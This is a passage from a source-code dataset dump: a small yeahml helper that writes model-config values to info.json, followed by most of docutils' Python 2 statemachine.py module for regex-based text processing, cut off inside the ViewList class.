] | permissive | yeahml/yeahml | 6d1523d01300532f19c54d8e9c320420df66ee5c | b51faff6625db5980151a4a5fac7bb49313df5c1 | refs/heads/master | 2023-08-11T16:49:41.181953 | 2020-11-14T20:33:58 | 2020-11-14T20:33:58 | 137,613,449 | 4 | 1 | Apache-2.0 | 2023-06-02T18:45:48 | 2018-06-16T22:11:19 | Python | UTF-8 | Python | false | false | 1,138 | py | import json
import pathlib
from typing import Any, Dict
def write_build_information(
    model_cdict: Dict[str, Any], meta_cdict: Dict[str, Any]
) -> bool:
    """Persist selected model-config values to ``info.json`` in the
    experiment directory (``<yeahml_dir>/<data_name>/<experiment_name>``).

    If the file already exists, tracked keys other than ``model_hash`` are
    asserted to match the current model config unless ``name_overwrite`` is
    set.  The file is then (re)written with the tracked keys.  Returns True.
    """
    exp_dir = (
        pathlib.Path(meta_cdict["yeahml_dir"])
        / meta_cdict["data_name"]
        / meta_cdict["experiment_name"]
    )
    info_path = exp_dir / "info.json"
    # Keys copied from the model config into info.json.
    tracked_keys = ["model_hash"]
    if info_path.exists():
        with open(info_path) as fp:
            existing = json.load(fp)
        for key in tracked_keys:
            # model_hash is allowed to change between runs; other tracked
            # keys must agree with any previously written value.
            if not key == "model_hash" and not meta_cdict["name_overwrite"]:
                assert (
                    existing[key] == model_cdict[key]
                ), f"info at {info_path} already contains the same values for keys {key}, but {info_path}={existing[key]} and model config = {model_cdict[key]}\n > possible solution: change the name of the current model?"
    payload = {key: model_cdict[key] for key in tracked_keys}
    with open(info_path, "w") as fp:
        json.dump(payload, fp)
    return True
| [
"jackbburdick@gmail.com"
] | jackbburdick@gmail.com |
1f17b50472da33c1556fc91a3bb78c6d64b9f62a | 997b9c4a79be49f3b1077d8a41f240c2e858bd58 | /src/.pycharm_helpers/docutils/statemachine.py | 317624e693c29d4ee186c792a60d52dd525b1a88 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | akiokio/centralfitestoque | 746b46c2e197b2fdfd84cb52e6e39962ae951984 | 7de35908852fb8e5e24720a37f4f4063c6c52be2 | refs/heads/master | 2020-05-17T02:48:48.433499 | 2013-11-10T14:00:46 | 2013-11-10T14:00:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 57,006 | py | # $Id: statemachine.py 6388 2010-08-13 12:24:34Z milde $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
A finite state machine specialized for regular-expression-based text filters,
this module defines the following classes:
- `StateMachine`, a state machine
- `State`, a state superclass
- `StateMachineWS`, a whitespace-sensitive version of `StateMachine`
- `StateWS`, a state superclass for use with `StateMachineWS`
- `SearchStateMachine`, uses `re.search()` instead of `re.match()`
- `SearchStateMachineWS`, uses `re.search()` instead of `re.match()`
- `ViewList`, extends standard Python lists.
- `StringList`, string-specific ViewList.
Exception classes:
- `StateMachineError`
- `UnknownStateError`
- `DuplicateStateError`
- `UnknownTransitionError`
- `DuplicateTransitionError`
- `TransitionPatternNotFound`
- `TransitionMethodNotFound`
- `UnexpectedIndentationError`
- `TransitionCorrection`: Raised to switch to another transition.
- `StateCorrection`: Raised to switch to another state & transition.
Functions:
- `string2lines()`: split a multi-line string into a list of one-line strings
How To Use This Module
======================
(See the individual classes, methods, and attributes for details.)
1. Import it: ``import statemachine`` or ``from statemachine import ...``.
You will also need to ``import re``.
2. Derive a subclass of `State` (or `StateWS`) for each state in your state
machine::
class MyState(statemachine.State):
Within the state's class definition:
a) Include a pattern for each transition, in `State.patterns`::
patterns = {'atransition': r'pattern', ...}
b) Include a list of initial transitions to be set up automatically, in
`State.initial_transitions`::
initial_transitions = ['atransition', ...]
c) Define a method for each transition, with the same name as the
transition pattern::
def atransition(self, match, context, next_state):
# do something
result = [...] # a list
return context, next_state, result
# context, next_state may be altered
Transition methods may raise an `EOFError` to cut processing short.
d) You may wish to override the `State.bof()` and/or `State.eof()` implicit
transition methods, which handle the beginning- and end-of-file.
e) In order to handle nested processing, you may wish to override the
attributes `State.nested_sm` and/or `State.nested_sm_kwargs`.
If you are using `StateWS` as a base class, in order to handle nested
indented blocks, you may wish to:
- override the attributes `StateWS.indent_sm`,
`StateWS.indent_sm_kwargs`, `StateWS.known_indent_sm`, and/or
`StateWS.known_indent_sm_kwargs`;
- override the `StateWS.blank()` method; and/or
- override or extend the `StateWS.indent()`, `StateWS.known_indent()`,
and/or `StateWS.firstknown_indent()` methods.
3. Create a state machine object::
sm = StateMachine(state_classes=[MyState, ...],
initial_state='MyState')
4. Obtain the input text, which needs to be converted into a tab-free list of
   one-line strings. For example, to read text from a file called
'inputfile'::
input_string = open('inputfile').read()
input_lines = statemachine.string2lines(input_string)
5. Run the state machine on the input text and collect the results, a list::
results = sm.run(input_lines)
6. Remove any lingering circular references::
sm.unlink()
"""
__docformat__ = 'restructuredtext'
import sys
import re
import types
import unicodedata
class StateMachine:
    """
    A finite state machine for text filters using regular expressions.
    The input is provided in the form of a list of one-line strings (no
    newlines). States are subclasses of the `State` class. Transitions consist
    of regular expression patterns and transition methods, and are defined in
    each state.
    The state machine is started with the `run()` method, which returns the
    results of processing in a list.
    """
    # NOTE: this module predates Python 3 support; it uses Python 2 syntax
    # (``print >>``, ``except E, name``) throughout.
    def __init__(self, state_classes, initial_state, debug=0):
        """
        Initialize a `StateMachine` object; add state objects.
        Parameters:
        - `state_classes`: a list of `State` (sub)classes.
        - `initial_state`: a string, the class name of the initial state.
        - `debug`: a boolean; produce verbose output if true (nonzero).
        """
        self.input_lines = None
        """`StringList` of input lines (without newlines).
        Filled by `self.run()`."""
        self.input_offset = 0
        """Offset of `self.input_lines` from the beginning of the file."""
        self.line = None
        """Current input line."""
        self.line_offset = -1
        """Current input line offset from beginning of `self.input_lines`."""
        self.debug = debug
        """Debugging mode on/off."""
        self.initial_state = initial_state
        """The name of the initial state (key to `self.states`)."""
        self.current_state = initial_state
        """The name of the current state (key to `self.states`)."""
        self.states = {}
        """Mapping of {state_name: State_object}."""
        self.add_states(state_classes)
        self.observers = []
        """List of bound methods or functions to call whenever the current
        line changes. Observers are called with one argument, ``self``.
        Cleared at the end of `run()`."""
    def unlink(self):
        """Remove circular references to objects no longer required."""
        for state in self.states.values():
            state.unlink()
        self.states = None
    def run(self, input_lines, input_offset=0, context=None,
            input_source=None, initial_state=None):
        """
        Run the state machine on `input_lines`. Return results (a list).
        Reset `self.line_offset` and `self.current_state`. Run the
        beginning-of-file transition. Input one line at a time and check for a
        matching transition. If a match is found, call the transition method
        and possibly change the state. Store the context returned by the
        transition method to be passed on to the next transition matched.
        Accumulate the results returned by the transition methods in a list.
        Run the end-of-file transition. Finally, return the accumulated
        results.
        Parameters:
        - `input_lines`: a list of strings without newlines, or `StringList`.
        - `input_offset`: the line offset of `input_lines` from the beginning
          of the file.
        - `context`: application-specific storage.
        - `input_source`: name or path of source of `input_lines`.
        - `initial_state`: name of initial state.
        """
        self.runtime_init()
        if isinstance(input_lines, StringList):
            self.input_lines = input_lines
        else:
            self.input_lines = StringList(input_lines, source=input_source)
        self.input_offset = input_offset
        self.line_offset = -1
        self.current_state = initial_state or self.initial_state
        if self.debug:
            print >>sys.stderr, (
                '\nStateMachine.run: input_lines (line_offset=%s):\n| %s'
                % (self.line_offset, '\n| '.join(self.input_lines)))
        transitions = None
        results = []
        state = self.get_state()
        try:
            if self.debug:
                print >>sys.stderr, ('\nStateMachine.run: bof transition')
            context, result = state.bof(context)
            results.extend(result)
            # Main loop: one input line per iteration.  Transition methods
            # may raise EOFError to stop early, or a *Correction exception
            # to back up one line and retry with a different transition
            # and/or state.
            while 1:
                try:
                    try:
                        self.next_line()
                        if self.debug:
                            source, offset = self.input_lines.info(
                                self.line_offset)
                            print >>sys.stderr, (
                                '\nStateMachine.run: line (source=%r, '
                                'offset=%r):\n| %s'
                                % (source, offset, self.line))
                        context, next_state, result = self.check_line(
                            context, state, transitions)
                    except EOFError:
                        if self.debug:
                            print >>sys.stderr, (
                                '\nStateMachine.run: %s.eof transition'
                                % state.__class__.__name__)
                        result = state.eof(context)
                        results.extend(result)
                        break
                    else:
                        results.extend(result)
                except TransitionCorrection, exception:
                    self.previous_line() # back up for another try
                    transitions = (exception.args[0],)
                    if self.debug:
                        print >>sys.stderr, (
                              '\nStateMachine.run: TransitionCorrection to '
                              'state "%s", transition %s.'
                              % (state.__class__.__name__, transitions[0]))
                    continue
                except StateCorrection, exception:
                    self.previous_line() # back up for another try
                    next_state = exception.args[0]
                    if len(exception.args) == 1:
                        transitions = None
                    else:
                        transitions = (exception.args[1],)
                    if self.debug:
                        print >>sys.stderr, (
                              '\nStateMachine.run: StateCorrection to state '
                              '"%s", transition %s.'
                              % (next_state, transitions[0]))
                else:
                    transitions = None
                state = self.get_state(next_state)
        except:
            # Bare except: report details when debugging, then always
            # re-raise -- no exception is swallowed here.
            if self.debug:
                self.error()
            raise
        self.observers = []
        return results
    def get_state(self, next_state=None):
        """
        Return current state object; set it first if `next_state` given.
        Parameter `next_state`: a string, the name of the next state.
        Exception: `UnknownStateError` raised if `next_state` unknown.
        """
        if next_state:
            if self.debug and next_state != self.current_state:
                print >>sys.stderr, \
                      ('\nStateMachine.get_state: Changing state from '
                       '"%s" to "%s" (input line %s).'
                       % (self.current_state, next_state,
                          self.abs_line_number()))
            self.current_state = next_state
        try:
            return self.states[self.current_state]
        except KeyError:
            raise UnknownStateError(self.current_state)
    def next_line(self, n=1):
        """Load `self.line` with the `n`'th next line and return it."""
        try:
            try:
                self.line_offset += n
                self.line = self.input_lines[self.line_offset]
            except IndexError:
                self.line = None
                raise EOFError
            return self.line
        finally:
            # Observers are notified even when EOFError propagates.
            self.notify_observers()
    def is_next_line_blank(self):
        """Return 1 if the next line is blank or non-existant."""
        try:
            return not self.input_lines[self.line_offset + 1].strip()
        except IndexError:
            return 1
    def at_eof(self):
        """Return 1 if the input is at or past end-of-file."""
        return self.line_offset >= len(self.input_lines) - 1
    def at_bof(self):
        """Return 1 if the input is at or before beginning-of-file."""
        return self.line_offset <= 0
    def previous_line(self, n=1):
        """Load `self.line` with the `n`'th previous line and return it."""
        self.line_offset -= n
        if self.line_offset < 0:
            self.line = None
        else:
            self.line = self.input_lines[self.line_offset]
        self.notify_observers()
        return self.line
    def goto_line(self, line_offset):
        """Jump to absolute line offset `line_offset`, load and return it."""
        try:
            try:
                self.line_offset = line_offset - self.input_offset
                self.line = self.input_lines[self.line_offset]
            except IndexError:
                self.line = None
                raise EOFError
            return self.line
        finally:
            self.notify_observers()
    def get_source(self, line_offset):
        """Return source of line at absolute line offset `line_offset`."""
        return self.input_lines.source(line_offset - self.input_offset)
    def abs_line_offset(self):
        """Return line offset of current line, from beginning of file."""
        return self.line_offset + self.input_offset
    def abs_line_number(self):
        """Return line number of current line (counting from 1)."""
        return self.line_offset + self.input_offset + 1
    def get_source_and_line(self, lineno=None):
        """Return (source, line) tuple for current or given line number.
        Looks up the source and line number in the `self.input_lines`
        StringList instance to count for included source files.
        If the optional argument `lineno` is given, convert it from an
        absolute line number to the corresponding (source, line) pair.
        """
        if lineno is None:
            offset = self.line_offset
        else:
            offset = lineno - self.input_offset - 1
        try:
            src, srcoffset = self.input_lines.info(offset)
            srcline = srcoffset + 1
        except (TypeError):
            # line is None if index is "Just past the end"
            src, srcline = self.get_source_and_line(offset + self.input_offset)
            return src, srcline + 1
        except (IndexError): # `offset` is off the list
            src, srcline = None, None
            # raise AssertionError('cannot find line %d in %s lines' %
            #                      (offset, len(self.input_lines)))
            #                      # list(self.input_lines.lines())))
        # assert offset == srcoffset, str(self.input_lines)
        # print "get_source_and_line(%s):" % lineno,
        # print offset + 1, '->', src, srcline
        # print self.input_lines
        return (src, srcline)
    def insert_input(self, input_lines, source):
        """Insert `input_lines` after the current line, bracketed by two
        blank "internal padding" lines whose source/offset metadata keeps
        line-number bookkeeping consistent for the included text."""
        self.input_lines.insert(self.line_offset + 1, '',
                                source='internal padding after '+source,
                                offset=len(input_lines))
        self.input_lines.insert(self.line_offset + 1, '',
                                source='internal padding before '+source,
                                offset=-1)
        self.input_lines.insert(self.line_offset + 2,
                                StringList(input_lines, source))
    def get_text_block(self, flush_left=0):
        """
        Return a contiguous block of text.
        If `flush_left` is true, raise `UnexpectedIndentationError` if an
        indented line is encountered before the text block ends (with a blank
        line).
        """
        try:
            block = self.input_lines.get_text_block(self.line_offset,
                                                    flush_left)
            self.next_line(len(block) - 1)
            return block
        except UnexpectedIndentationError, error:
            block, source, lineno = error.args
            self.next_line(len(block) - 1) # advance to last line of block
            raise
    def check_line(self, context, state, transitions=None):
        """
        Examine one line of input for a transition match & execute its method.
        Parameters:
        - `context`: application-dependent storage.
        - `state`: a `State` object, the current state.
        - `transitions`: an optional ordered list of transition names to try,
          instead of ``state.transition_order``.
        Return the values returned by the transition method:
        - context: possibly modified from the parameter `context`;
        - next state name (`State` subclass name);
        - the result output of the transition, a list.
        When there is no match, ``state.no_match()`` is called and its return
        value is returned.
        """
        if transitions is None:
            transitions =  state.transition_order
        state_correction = None
        if self.debug:
            print >>sys.stderr, (
                  '\nStateMachine.check_line: state="%s", transitions=%r.'
                  % (state.__class__.__name__, transitions))
        # First matching transition wins; patterns are tried in order.
        for name in transitions:
            pattern, method, next_state = state.transitions[name]
            match = pattern.match(self.line)
            if match:
                if self.debug:
                    print >>sys.stderr, (
                          '\nStateMachine.check_line: Matched transition '
                          '"%s" in state "%s".'
                          % (name, state.__class__.__name__))
                return method(match, context, next_state)
        else:
            if self.debug:
                print >>sys.stderr, (
                      '\nStateMachine.check_line: No match in state "%s".'
                      % state.__class__.__name__)
            return state.no_match(context, transitions)
    def add_state(self, state_class):
        """
        Initialize & add a `state_class` (`State` subclass) object.
        Exception: `DuplicateStateError` raised if `state_class` was already
        added.
        """
        statename = state_class.__name__
        if statename in self.states:
            raise DuplicateStateError(statename)
        self.states[statename] = state_class(self, self.debug)
    def add_states(self, state_classes):
        """
        Add `state_classes` (a list of `State` subclasses).
        """
        for state_class in state_classes:
            self.add_state(state_class)
    def runtime_init(self):
        """
        Initialize `self.states`.
        """
        for state in self.states.values():
            state.runtime_init()
    def error(self):
        """Report error details."""
        type, value, module, line, function = _exception_data()
        print >>sys.stderr, '%s: %s' % (type, value)
        print >>sys.stderr, 'input line %s' % (self.abs_line_number())
        print >>sys.stderr, ('module %s, line %s, function %s'
                             % (module, line, function))
    def attach_observer(self, observer):
        """
        The `observer` parameter is a function or bound method which takes two
        arguments, the source and offset of the current line.
        """
        self.observers.append(observer)
    def detach_observer(self, observer):
        """Remove a previously attached `observer` callable."""
        self.observers.remove(observer)
    def notify_observers(self):
        """Call every observer with the (source, offset) of the current
        line; ``(None, None)`` when the offset is out of range."""
        for observer in self.observers:
            try:
                info = self.input_lines.info(self.line_offset)
            except IndexError:
                info = (None, None)
            observer(*info)
class State:
"""
State superclass. Contains a list of transitions, and transition methods.
Transition methods all have the same signature. They take 3 parameters:
- An `re` match object. ``match.string`` contains the matched input line,
``match.start()`` gives the start index of the match, and
``match.end()`` gives the end index.
- A context object, whose meaning is application-defined (initial value
``None``). It can be used to store any information required by the state
machine, and the retured context is passed on to the next transition
method unchanged.
- The name of the next state, a string, taken from the transitions list;
normally it is returned unchanged, but it may be altered by the
transition method if necessary.
Transition methods all return a 3-tuple:
- A context object, as (potentially) modified by the transition method.
- The next state name (a return value of ``None`` means no state change).
- The processing result, a list, which is accumulated by the state
machine.
Transition methods may raise an `EOFError` to cut processing short.
There are two implicit transitions, and corresponding transition methods
are defined: `bof()` handles the beginning-of-file, and `eof()` handles
the end-of-file. These methods have non-standard signatures and return
values. `bof()` returns the initial context and results, and may be used
to return a header string, or do any other processing needed. `eof()`
should handle any remaining context and wrap things up; it returns the
final processing result.
Typical applications need only subclass `State` (or a subclass), set the
`patterns` and `initial_transitions` class attributes, and provide
corresponding transition methods. The default object initialization will
take care of constructing the list of transitions.
"""
patterns = None
"""
{Name: pattern} mapping, used by `make_transition()`. Each pattern may
be a string or a compiled `re` pattern. Override in subclasses.
"""
initial_transitions = None
"""
A list of transitions to initialize when a `State` is instantiated.
Each entry is either a transition name string, or a (transition name, next
state name) pair. See `make_transitions()`. Override in subclasses.
"""
nested_sm = None
"""
The `StateMachine` class for handling nested processing.
If left as ``None``, `nested_sm` defaults to the class of the state's
controlling state machine. Override it in subclasses to avoid the default.
"""
nested_sm_kwargs = None
"""
Keyword arguments dictionary, passed to the `nested_sm` constructor.
Two keys must have entries in the dictionary:
- Key 'state_classes' must be set to a list of `State` classes.
- Key 'initial_state' must be set to the name of the initial state class.
If `nested_sm_kwargs` is left as ``None``, 'state_classes' defaults to the
class of the current state, and 'initial_state' defaults to the name of
the class of the current state. Override in subclasses to avoid the
defaults.
"""
    def __init__(self, state_machine, debug=0):
        """
        Initialize a `State` object; make & add initial transitions.
        Parameters:
        - `state_machine`: the controlling `StateMachine` object.
        - `debug`: a boolean; produce verbose output if true (nonzero).
        """
        self.transition_order = []
        """A list of transition names in search order."""
        self.transitions = {}
        """
        A mapping of transition names to 3-tuples containing
        (compiled_pattern, transition_method, next_state_name). Initialized as
        an instance attribute dynamically (instead of as a class attribute)
        because it may make forward references to patterns and methods in this
        or other classes.
        """
        # Transitions are built before the machine reference is stored;
        # make_transition() only needs `self.patterns` and bound methods.
        self.add_initial_transitions()
        self.state_machine = state_machine
        """A reference to the controlling `StateMachine` object."""
        self.debug = debug
        """Debugging mode on/off."""
        # Default nested-machine configuration: reuse the controlling
        # machine's class with this state as its single initial state.
        if self.nested_sm is None:
            self.nested_sm = self.state_machine.__class__
        if self.nested_sm_kwargs is None:
            self.nested_sm_kwargs = {'state_classes': [self.__class__],
                                     'initial_state': self.__class__.__name__}
    def runtime_init(self):
        """
        Initialize this `State` before running the state machine; called from
        `self.state_machine.run()`.
        """
        # No-op here; subclasses override to perform per-run setup.
        pass
def unlink(self):
"""Remove circular references to objects no longer required."""
self.state_machine = None
def add_initial_transitions(self):
"""Make and add transitions listed in `self.initial_transitions`."""
if self.initial_transitions:
names, transitions = self.make_transitions(
self.initial_transitions)
self.add_transitions(names, transitions)
def add_transitions(self, names, transitions):
"""
Add a list of transitions to the start of the transition list.
Parameters:
- `names`: a list of transition names.
- `transitions`: a mapping of names to transition tuples.
Exceptions: `DuplicateTransitionError`, `UnknownTransitionError`.
"""
for name in names:
if name in self.transitions:
raise DuplicateTransitionError(name)
if name not in transitions:
raise UnknownTransitionError(name)
self.transition_order[:0] = names
self.transitions.update(transitions)
def add_transition(self, name, transition):
"""
Add a transition to the start of the transition list.
Parameter `transition`: a ready-made transition 3-tuple.
Exception: `DuplicateTransitionError`.
"""
if name in self.transitions:
raise DuplicateTransitionError(name)
self.transition_order[:0] = [name]
self.transitions[name] = transition
def remove_transition(self, name):
"""
Remove a transition by `name`.
Exception: `UnknownTransitionError`.
"""
try:
del self.transitions[name]
self.transition_order.remove(name)
except:
raise UnknownTransitionError(name)
    def make_transition(self, name, next_state=None):
        """
        Make & return a transition tuple based on `name`.
        This is a convenience function to simplify transition creation.
        Parameters:
        - `name`: a string, the name of the transition pattern & method. This
          `State` object must have a method called '`name`', and a dictionary
          `self.patterns` containing a key '`name`'.
        - `next_state`: a string, the name of the next `State` object for this
          transition. A value of ``None`` (or absent) implies no state change
          (i.e., continue with the same state).
        Exceptions: `TransitionPatternNotFound`, `TransitionMethodNotFound`.
        """
        if next_state is None:
            # No state change: stay in this state (named after the class).
            next_state = self.__class__.__name__
        try:
            pattern = self.patterns[name]
            # Accept either a pre-compiled regex (has .match) or a raw
            # pattern string, which is compiled lazily here.
            if not hasattr(pattern, 'match'):
                pattern = re.compile(pattern)
        except KeyError:
            raise TransitionPatternNotFound(
                '%s.patterns[%r]' % (self.__class__.__name__, name))
        try:
            # The transition method must share the transition's name.
            method = getattr(self, name)
        except AttributeError:
            raise TransitionMethodNotFound(
                '%s.%s' % (self.__class__.__name__, name))
        return (pattern, method, next_state)
def make_transitions(self, name_list):
"""
Return a list of transition names and a transition mapping.
Parameter `name_list`: a list, where each entry is either a transition
name string, or a 1- or 2-tuple (transition name, optional next state
name).
"""
stringtype = type('')
names = []
transitions = {}
for namestate in name_list:
if type(namestate) is stringtype:
transitions[namestate] = self.make_transition(namestate)
names.append(namestate)
else:
transitions[namestate[0]] = self.make_transition(*namestate)
names.append(namestate[0])
return names, transitions
def no_match(self, context, transitions):
"""
Called when there is no match from `StateMachine.check_line()`.
Return the same values returned by transition methods:
- context: unchanged;
- next state name: ``None``;
- empty result list.
Override in subclasses to catch this event.
"""
return context, None, []
def bof(self, context):
"""
Handle beginning-of-file. Return unchanged `context`, empty result.
Override in subclasses.
Parameter `context`: application-defined storage.
"""
return context, []
def eof(self, context):
"""
Handle end-of-file. Return empty result.
Override in subclasses.
Parameter `context`: application-defined storage.
"""
return []
def nop(self, match, context, next_state):
"""
A "do nothing" transition method.
Return unchanged `context` & `next_state`, empty result. Useful for
simple state changes (actionless transitions).
"""
return context, next_state, []
class StateMachineWS(StateMachine):
    """
    `StateMachine` subclass specialized for whitespace recognition.
    There are three methods provided for extracting indented text blocks:
    - `get_indented()`: use when the indent is unknown.
    - `get_known_indented()`: use when the indent is known for all lines.
    - `get_first_known_indented()`: use when only the first line's indent is
      known.
    """
    def get_indented(self, until_blank=0, strip_indent=1):
        """
        Return a block of indented lines of text, and info.
        Extract an indented block where the indent is unknown for all lines.
        :Parameters:
            - `until_blank`: Stop collecting at the first blank line if true
              (1).
            - `strip_indent`: Strip common leading indent if true (1,
              default).
        :Return:
            - the indented block (a list of lines of text),
            - its indent,
            - its first line offset from BOF, and
            - whether or not it finished with a blank line.
        """
        offset = self.abs_line_offset()
        indented, indent, blank_finish = self.input_lines.get_indented(
            self.line_offset, until_blank, strip_indent)
        if indented:
            self.next_line(len(indented) - 1) # advance to last indented line
        # Drop leading blank lines from the block, keeping `offset` in sync
        # so it still refers to the first retained line.
        while indented and not indented[0].strip():
            indented.trim_start()
            offset += 1
        return indented, indent, offset, blank_finish
    def get_known_indented(self, indent, until_blank=0, strip_indent=1):
        """
        Return an indented block and info.
        Extract an indented block where the indent is known for all lines.
        Starting with the current line, extract the entire text block with at
        least `indent` indentation (which must be whitespace, except for the
        first line).
        :Parameters:
            - `indent`: The number of indent columns/characters.
            - `until_blank`: Stop collecting at the first blank line if true
              (1).
            - `strip_indent`: Strip `indent` characters of indentation if true
              (1, default).
        :Return:
            - the indented block,
            - its first line offset from BOF, and
            - whether or not it finished with a blank line.
        """
        offset = self.abs_line_offset()
        indented, indent, blank_finish = self.input_lines.get_indented(
            self.line_offset, until_blank, strip_indent,
            block_indent=indent)
        # NOTE(review): unlike get_indented(), this call is not guarded by
        # ``if indented`` — presumably the first line is always part of the
        # block here; confirm that `indented` can never be empty.
        self.next_line(len(indented) - 1) # advance to last indented line
        # Drop leading blank lines, keeping `offset` in sync.
        while indented and not indented[0].strip():
            indented.trim_start()
            offset += 1
        return indented, offset, blank_finish
    def get_first_known_indented(self, indent, until_blank=0, strip_indent=1,
                                 strip_top=1):
        """
        Return an indented block and info.
        Extract an indented block where the indent is known for the first line
        and unknown for all other lines.
        :Parameters:
            - `indent`: The first line's indent (# of columns/characters).
            - `until_blank`: Stop collecting at the first blank line if true
              (1).
            - `strip_indent`: Strip `indent` characters of indentation if true
              (1, default).
            - `strip_top`: Strip blank lines from the beginning of the block.
        :Return:
            - the indented block,
            - its indent,
            - its first line offset from BOF, and
            - whether or not it finished with a blank line.
        """
        offset = self.abs_line_offset()
        indented, indent, blank_finish = self.input_lines.get_indented(
            self.line_offset, until_blank, strip_indent,
            first_indent=indent)
        self.next_line(len(indented) - 1) # advance to last indented line
        if strip_top:
            # Optionally drop leading blank lines, keeping `offset` in sync.
            while indented and not indented[0].strip():
                indented.trim_start()
                offset += 1
        return indented, indent, offset, blank_finish
class StateWS(State):
    """
    State superclass specialized for whitespace (blank lines & indents).
    Use this class with `StateMachineWS`. The transitions 'blank' (for blank
    lines) and 'indent' (for indented text blocks) are added automatically,
    before any other transitions. The transition method `blank()` handles
    blank lines and `indent()` handles nested indented blocks. Indented
    blocks trigger a new state machine to be created by `indent()` and run.
    The class of the state machine to be created is in `indent_sm`, and the
    constructor keyword arguments are in the dictionary `indent_sm_kwargs`.
    The methods `known_indent()` and `firstknown_indent()` are provided for
    indented blocks where the indent (all lines' and first line's only,
    respectively) is known to the transition method, along with the attributes
    `known_indent_sm` and `known_indent_sm_kwargs`. Neither transition method
    is triggered automatically.
    """
    indent_sm = None
    """
    The `StateMachine` class handling indented text blocks.
    If left as ``None``, `indent_sm` defaults to the value of
    `State.nested_sm`. Override it in subclasses to avoid the default.
    """
    indent_sm_kwargs = None
    """
    Keyword arguments dictionary, passed to the `indent_sm` constructor.
    If left as ``None``, `indent_sm_kwargs` defaults to the value of
    `State.nested_sm_kwargs`. Override it in subclasses to avoid the default.
    """
    known_indent_sm = None
    """
    The `StateMachine` class handling known-indented text blocks.
    If left as ``None``, `known_indent_sm` defaults to the value of
    `indent_sm`. Override it in subclasses to avoid the default.
    """
    known_indent_sm_kwargs = None
    """
    Keyword arguments dictionary, passed to the `known_indent_sm` constructor.
    If left as ``None``, `known_indent_sm_kwargs` defaults to the value of
    `indent_sm_kwargs`. Override it in subclasses to avoid the default.
    """
    ws_patterns = {'blank': ' *$',
                   'indent': ' +'}
    """Patterns for default whitespace transitions. May be overridden in
    subclasses."""
    ws_initial_transitions = ('blank', 'indent')
    """Default initial whitespace transitions, added before those listed in
    `State.initial_transitions`. May be overridden in subclasses."""
    def __init__(self, state_machine, debug=0):
        """
        Initialize a `StateSM` object; extends `State.__init__()`.
        Check for indent state machine attributes, set defaults if not set.
        """
        State.__init__(self, state_machine, debug)
        # Cascade of defaults: indent_sm <- nested_sm,
        # known_indent_sm <- indent_sm (and likewise for the kwargs dicts).
        if self.indent_sm is None:
            self.indent_sm = self.nested_sm
        if self.indent_sm_kwargs is None:
            self.indent_sm_kwargs = self.nested_sm_kwargs
        if self.known_indent_sm is None:
            self.known_indent_sm = self.indent_sm
        if self.known_indent_sm_kwargs is None:
            self.known_indent_sm_kwargs = self.indent_sm_kwargs
    def add_initial_transitions(self):
        """
        Add whitespace-specific transitions before those defined in subclass.
        Extends `State.add_initial_transitions()`.
        """
        State.add_initial_transitions(self)
        if self.patterns is None:
            self.patterns = {}
        self.patterns.update(self.ws_patterns)
        # Prepend 'blank' and 'indent' so whitespace is recognized before
        # any subclass-defined transitions.
        names, transitions = self.make_transitions(
            self.ws_initial_transitions)
        self.add_transitions(names, transitions)
    def blank(self, match, context, next_state):
        """Handle blank lines. Does nothing. Override in subclasses."""
        return self.nop(match, context, next_state)
    def indent(self, match, context, next_state):
        """
        Handle an indented text block. Extend or override in subclasses.
        Recursively run the registered state machine for indented blocks
        (`self.indent_sm`).
        """
        indented, indent, line_offset, blank_finish = \
            self.state_machine.get_indented()
        # A fresh nested state machine processes the indented block.
        sm = self.indent_sm(debug=self.debug, **self.indent_sm_kwargs)
        results = sm.run(indented, input_offset=line_offset)
        return context, next_state, results
    def known_indent(self, match, context, next_state):
        """
        Handle a known-indent text block. Extend or override in subclasses.
        Recursively run the registered state machine for known-indent indented
        blocks (`self.known_indent_sm`). The indent is the length of the
        match, ``match.end()``.
        """
        indented, line_offset, blank_finish = \
            self.state_machine.get_known_indented(match.end())
        sm = self.known_indent_sm(debug=self.debug,
                                  **self.known_indent_sm_kwargs)
        results = sm.run(indented, input_offset=line_offset)
        return context, next_state, results
    def first_known_indent(self, match, context, next_state):
        """
        Handle an indented text block (first line's indent known).
        Extend or override in subclasses.
        Recursively run the registered state machine for known-indent indented
        blocks (`self.known_indent_sm`). The indent is the length of the
        match, ``match.end()``.
        """
        indented, line_offset, blank_finish = \
            self.state_machine.get_first_known_indented(match.end())
        sm = self.known_indent_sm(debug=self.debug,
                                  **self.known_indent_sm_kwargs)
        results = sm.run(indented, input_offset=line_offset)
        return context, next_state, results
class _SearchOverride:
"""
Mix-in class to override `StateMachine` regular expression behavior.
Changes regular expression matching, from the default `re.match()`
(succeeds only if the pattern matches at the start of `self.line`) to
`re.search()` (succeeds if the pattern matches anywhere in `self.line`).
When subclassing a `StateMachine`, list this class **first** in the
inheritance list of the class definition.
"""
def match(self, pattern):
"""
Return the result of a regular expression search.
Overrides `StateMachine.match()`.
Parameter `pattern`: `re` compiled regular expression.
"""
return pattern.search(self.line)
# Concrete "search" variants.  The mix-in must come first in the bases so
# its match() takes precedence over the StateMachine default.
class SearchStateMachine(_SearchOverride, StateMachine):
    """`StateMachine` which uses `re.search()` instead of `re.match()`."""
    pass
class SearchStateMachineWS(_SearchOverride, StateMachineWS):
    """`StateMachineWS` which uses `re.search()` instead of `re.match()`."""
    pass
class ViewList:
    """
    List with extended functionality: slices of ViewList objects are child
    lists, linked to their parents. Changes made to a child list also affect
    the parent list. A child list is effectively a "view" (in the SQL sense)
    of the parent list. Changes to parent lists, however, do *not* affect
    active child lists. If a parent list is changed, any active child lists
    should be recreated.
    The start and end of the slice can be trimmed using the `trim_start()` and
    `trim_end()` methods, without affecting the parent list. The link between
    child and parent lists can be broken by calling `disconnect()` on the
    child list.
    Also, ViewList objects keep track of the source & offset of each item.
    This information is accessible via the `source()`, `offset()`, and
    `info()` methods.
    """
    def __init__(self, initlist=None, source=None, items=None,
                 parent=None, parent_offset=None):
        self.data = []
        """The actual list of data, flattened from various sources."""
        self.items = []
        """A list of (source, offset) pairs, same length as `self.data`: the
        source of each line and the offset of each line from the beginning of
        its source."""
        self.parent = parent
        """The parent list."""
        self.parent_offset = parent_offset
        """Offset of this list from the beginning of the parent list."""
        # Copying another ViewList clones both data and item metadata;
        # a plain iterable gets synthetic (source, index) item pairs.
        if isinstance(initlist, ViewList):
            self.data = initlist.data[:]
